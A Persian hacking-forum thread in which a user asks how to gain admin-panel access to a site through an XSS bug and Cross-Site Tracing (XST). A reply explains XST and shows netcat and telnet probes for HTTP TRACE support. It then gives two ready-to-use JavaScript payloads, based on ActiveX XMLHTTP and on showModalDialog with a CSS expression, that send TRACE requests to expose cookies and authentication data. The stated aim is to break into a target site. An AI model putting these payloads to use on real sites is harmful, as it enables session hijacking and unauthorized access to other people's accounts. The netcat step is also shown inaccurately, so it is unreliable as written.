hajsajjad 1 گزارش دادن ارسال شده در اسفند 97 سلام چطور میشه از XST با کمک باگ xss دسترسی گرفت؟ آیا راهی بجز کوکی گرابر برای زدن سایت دارای باگ xss سراغ دارید، برای دسترسی به پنل نه حملات ddos و dos ؟ 1 واکنش ها : johnjones به اشتراک گذاری این ارسال لینک به ارسال به اشتراک گذاری در سایت های دیگر
Mr.Nashena3 253 گزارش دادن ارسال شده در اسفند 97 با سلام اول بد نیست بگم ک اسم کاملش هست Cross-Site-Tracing ک به XST یا CST معروف هست XST یا CST یک فرم پیچیده از اسکریپت های (XSS) است که می تواند مانع از اقدامات امنیتی که قبلا برای محافظت در برابر XSS ایجاد شده است را کنار بگذارد. این شکل جدید حمله به نفوذگر اجازه می دهد کوکی ها و سایر اطلاعات احراز هویت را با استفاده از یک اسکریپت ساده در سمت سرویس گیرنده بدست آورد. به منظور محافظت از XST، کاربران اینترنت می توانند جاوا اسکریپت یا اکتیو ایکس را در مرورگرهای خود غیرفعال کنند. آموزش آیا هدف از HTTP TRACE پشتیبانی می کند؟ - با NetCat برای دانستن بر روی دستگاه لینوکس خود بروید و NETCAT را دانلود کنید. سپس، دستور زیر را دوست دارید nc www.target.com 80 چیزی شبیه به این باید بازگردانده شود HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 31 Oct 2006 08:00:29 GMT Connection: close Allow: GET, HEAD, POST, TRACE, OPTIONS Content-Length: 0 همانطور که در خط 5 دیده می شود، TRACE پشتیبانی می شود. با Telnet فقط این دستور را وارد کنید telnet www.target.com 80 اگر در گزارش مشاهده کنید خط "TRACE:yes"، بنابراین فعال شده است. با RESTClient (افزودنی فایرفاکس). لینک دانلود: https://addons.mozilla.org/ Exploitationهدف این است که برای وارد کردن یک اسکریپت XST (= request) در یک صفحه وب Target به عنوان یک روش POST. یک مثال: <script type=”text/javascript”> [b]<!--[/b] function sendTrace () { var xmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”); xmlHttp.open(“TRACE”, “INSERT_YOUR_URL_HERE”,false); xmlHttp.send(); xmlDoc=xmlHttp.responseText; alert(xmlDoc); } //--> </script> <INPUT TYPE=BUTTON OnClick=”sendTrace();” VALUE=”Send Trace Request”> توضیحات این اسکریپت را که شما می توانید در زیر ببینید : var xmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”); Object ایجاد می کند xmlHttp.open(“TRACE”, “INSERT_YOUR_URL_HERE”,false); نوع درخواست، URL را مشخص می کند و اگر درخواست باید به صورت غیر همزمان انجام شود یا نه. روش: نوع درخواست - GET یا POSTurl: محل فایل در سرورasync: true (ناهمزمان) یا false (همگام) xmlHttp.send(); برای انتقال اطلاعات به سرور استفاده می شود xmlDoc=xmlHttp.responseText; داده های پاسخ را به عنوان یک رشته دریافت کنید alert(xmlDoc); نمایش محتوای XML با استفاده از جاوا اسکریپت <INPUT TYPE=BUTTON OnClick=”sendTrace();” VALUE=”Send Trace Request”>یک دکمه را ایجاد می کند. برای بازگرداندن، اسکریپت هنگام کلیک بر روی آن شروع می شود. اسکریپت دیگر، که برای XST بهتر است: <script type=”text/javascript”> function xssDomainTraceRequest(){ var exampleCode = “var xmlHttp = new ActiveXObject(\”Microsoft.XMLHTTP\”)\;xmlHttp.open(\”TRACE\”,\”INSERT_YOUR_URL_HERE\”,false)\ ;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;”; var target = “INSERT_YOUR_URL_HERE”; cExampleCode = encodeURIComponent(exampleCode + ‘;top.close()’); var readyCode = ‘font-size:expression(execScript(decodeURIComponent(“’ + cExampleCode + ‘”)))’; showModalDialog(target, null, readyCode); } </script> <INPUT TYPE=BUTTON OnClick=”xssDomainTraceRequest()” VALUE=”Show Cookie Information Using TRACE”> توضیحات بعضی از دستورات (خب صادقانه، من توضیح نمی دم - برای اسکریپت اول ساده تر بود): توجه داشته باشید که بخشی از داده هایی که دریافت می کنید (مانند پارامتر مجوز) در BASE64 کد گذاری می شود.شما می توانید تن از رمزگشایی های BASE64 را پیدا کنید، اما من این را توصیه می کنم: https://www.base64decode.org/شما باید یک classic JS window داشته باشید که وقتی کد اسکریپت را می بینید ظاهر می شود. در حال حاضر، تفاوت های زیادی با XSS نمی بینید. 5 3 واکنش ها : nnje ، DeMoN ، RT3N و 5 نفر دیگر به اشتراک گذاری این ارسال لینک به ارسال به اشتراک گذاری در سایت های دیگر